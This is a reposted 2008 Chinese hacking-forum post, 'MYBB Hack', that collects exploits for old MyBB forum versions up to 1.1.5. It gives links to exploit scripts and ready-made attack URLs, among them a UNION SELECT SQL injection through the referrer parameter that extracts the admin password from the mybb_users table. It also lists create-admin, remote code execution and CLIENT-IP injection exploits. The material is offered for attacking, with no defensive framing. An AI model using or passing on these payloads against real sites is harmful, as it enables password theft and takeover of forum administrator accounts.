【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [转载]MYBB Hack [打印本页]

作者: 冰绿茶 时间: 2008-7-21 00:55 标题: [转载]MYBB Hack

[转载]MYBB Hack
MyBB <= 1.00 RC4

SQL Injection Exploit

Exploit:
http://milw0rm.org/exploits/1022
http://milw0rm.org/exploits/1172

MyBB 1.0.2
Quote:http://www.strona.com/search.php?s=[de1aaf9b]&action=do_search&keywords=a&srchtype=3

MyBB 1.03
Quote:http://www.example.com/moderation.php?posts=[pid]|&tid=[pid]&action=do_multimergeposts&sep=hr

MyBB <= 1.04

收集的MYBB 漏洞 BY 混世魔王
Wys?any: 2006-12-04, 21:17 myBB Hack
MyBB <= 1.00 RC4

SQL Injection Exploit

Exploit:
http://milw0rm.org/exploits/1022
http://milw0rm.org/exploits/1172

MyBB 1.0.2

Kod:
http://www.strona.com/search.php?s=[de1aaf9b]&action=do_search&keywords=a&srchtype=3

MyBB 1.03

Cytat
http://www.example.com/moderation.php?posts=[pid]|&tid=[pid]&action=do_multimergeposts&sep=hr

MyBB <= 1.04

Exploit:
http://www.security.nnov.ru/files/mybbex.pl

MyBB <= 1.1.2
Quote:http://www.strona.com/index.php?referrer=9999999999'%20UNION%20SELECT%20 password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,
3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20FROM%20mybb_us ers%20WHERE%20uid=1*

remote code execution
Exploit:
http://www.security.nnov.ru/files/mybibi.pl

MyBB <= 1.1.3

Create Admin Exploit

Exploit:
http://milw0rm.org/exploits/1950

MyBB <= 1.1.5

'CLIENT-IP' SQL injection / create new admin exploit
Exploit:
http://www.security.nnov.ru/files/mybbsipsql.php取保候审中........

帖子181 精华10 积分3720 阅读权限100 性别男在线时间88 小时注册时间2005-3-12 最后登录2008-6-19 查看详细资料引用报告回复 TOP 您知道您年薪应是多少?

19830821

晶莹剔透§烈日灼然

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)